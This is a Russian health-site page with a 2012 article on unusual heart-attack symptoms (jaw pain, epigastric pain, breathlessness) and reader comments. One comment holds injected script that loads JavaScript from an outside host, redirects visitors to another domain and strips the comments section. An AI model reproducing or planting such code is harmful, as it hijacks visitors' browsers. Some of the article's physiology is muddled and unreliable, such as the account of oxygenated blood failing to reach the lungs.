Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Три необычных признака ин...  >>  Три необычных признака инфаркта миокарда
 
Обратная связь
 

Три необычных признака инфаркта миокарда

Размер шрифта
16 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Болезнь – хитрая штука. Она маскируется под что угодно, лишь бы ее не обнаружили. В силах человека – не пропустить даже самые «странные» симптомы. Тем более если речь идет об инфаркте миокарда, когда нельзя терять ни минуты.

1

«Классические» симптомы инфаркта миокарда:

  • загрудинная боль, жгучего или давящего характера
  • перемещается в прекардиальную область (левую сторону груди)
  • довольно часто боль отдает в спину
  • жгучая боль сопровождается страхом смерти. Человеку кажется, что на грудь положили тяжелый пресс весом в тонну.

При малейшем подозрении на инфаркт миокарда человек должен мчаться в больницу, чтобы врач успел раскрыть стенозированный (закрытый) сосуд, предотвратив тем самым некроз сердечной мышцы.

На то, чтобы оказать помощь, у врача всего 90 минут. В идеале человек должен попасть в больницу в течение первого часа, который врачи называют «золотым». Вот почему так важно обратить внимание даже на самые странные симптомы.

Скрытые симптомы инфаркта миокарда:

  1. Боль в нижней челюсти.

Описание ощущения: «ломит зубы».

Сердечная боль по сплетению нервных окончаний отдает в нижнюю челюсть. Создается ощущение, что болят абсолютно все зубы нижней челюсти. Кроме того, боль в этот момент может отдавать в руку, плечо и шею. У людей с ишемической болезнью сердца в холодную погоду предвестниками такой боли могут стать короткие приступы ломоты в нижней челюсти.

  1. Боль «под ложечкой», в эпигастральной области.

Описание ощущения: «тошнота», «рвота», «вздутие живота».

Сердце расположено близко к желудку, их разделяет только диафрагма. Если инфаркт развивается по задней стенке сердца, той, что направлена в сторону желудка, тогда человек будет испытывать боль в желудке при инфаркте. Болевые импульсы от сердца поступают в спинной мозг, а затем в голову. Из-за близкого расположения сердца и желудка головной мозг часто не может различить, от какого из этих двух органов идет сигнал боли. По статистике, 60% пациентов с инфарктом миокарда, испытывающих боль в животе, – женщины.

1

  1. Затруднение дыхания, одышка при отсутствии боли в сердце.

Описание ощущения: «Не хватает воздуха».

Если сердцу не хватает кислорода, это значит, что сосуд закупорился, в сердечную мышцу не поступает кровь, поэтому сократительная способность мышцы сердца снижается. Количество крови, насыщенной кислородом, уменьшается. В результате человеку кажется, что ему не хватает воздуха.

Есть еще одно коварное обстоятельство. За транспортировку кислорода в организме отвечают клетки крови – эритроциты. Они насыщаются кислородом в легких, затем переносят этот кислород к тканям, забирая от них углекислый газ. При инфаркте миокарда передача кислорода в сердечную мышцу нарушается. Возникает кислородное голодание (ишемия).

Мозг, получив сигнал о нехватке кислорода, пытается ее каким-то образом компенсировать и заставляет человека чаще дышать. Однако обогащенные кислородом эритроциты не могут попасть в легкие, из-за того, что сократительная способность сердца снижена.

Как отличить одышку от скрытого симптома инфаркта?

Норма дыхания составляет 14 дыхательных движений в минуту. Если дыхание учащено, и человек при этом не может лежать из-за усиливающейся одышки, пытается удобней сесть, – пора бить тревогу: в вашем распоряжении всего 90 минут!

 


Сюжеты по теме:

Необычные симптомы инфаркта миокарда 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

16 февраля 2012 в 17:18

Цитировать   |   Пожаловаться

Спасибо автору. Полезная информация. Изложена доступным языком. Очень коротко и все по существу

Гость 16 февраля 2012 в 17:18
Спасибо автору
 Вам спасибо за добрые слова. :--))

3 - Гость

20 февраля 2012 в 23:44

Цитировать   |   Пожаловаться

статья хорошая, полностью согласна с № 1. но, пожалуйста, исправьте "ОТДЫШКА" на правильное "одышка", а то вроде бы как и не медик писал эту статью.....

Гость 20 февраля 2012 в 23:44
исправьте "ОТДЫШКА
 Да конечно ОДЫШКА. Технические  погрешности работы.  Спасибо за внимание. 

5 - zzzzzz

30 июня 2015 в 23:55

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Новое о чае. Дополнительные аргументы в пользу чаепития   Что с вами делает злость?   Как пережить жару дома   5 цифр про вашего мужа и сына, которые вы должны знать  
22 июня 2013Грецкие орехи спасут от инфаркта 20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 04 июня 2013У вас лысый муж? Он может умереть от инфаркта
 

Слайдшоу

1
Есть ли секс после инфаркта?
Смертельные опасности для родителей зимой
Что делать, если муж храпит?

Тесты

Будет ли у вас инфаркт?
Грозит ли вам инфаркт миокарда?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.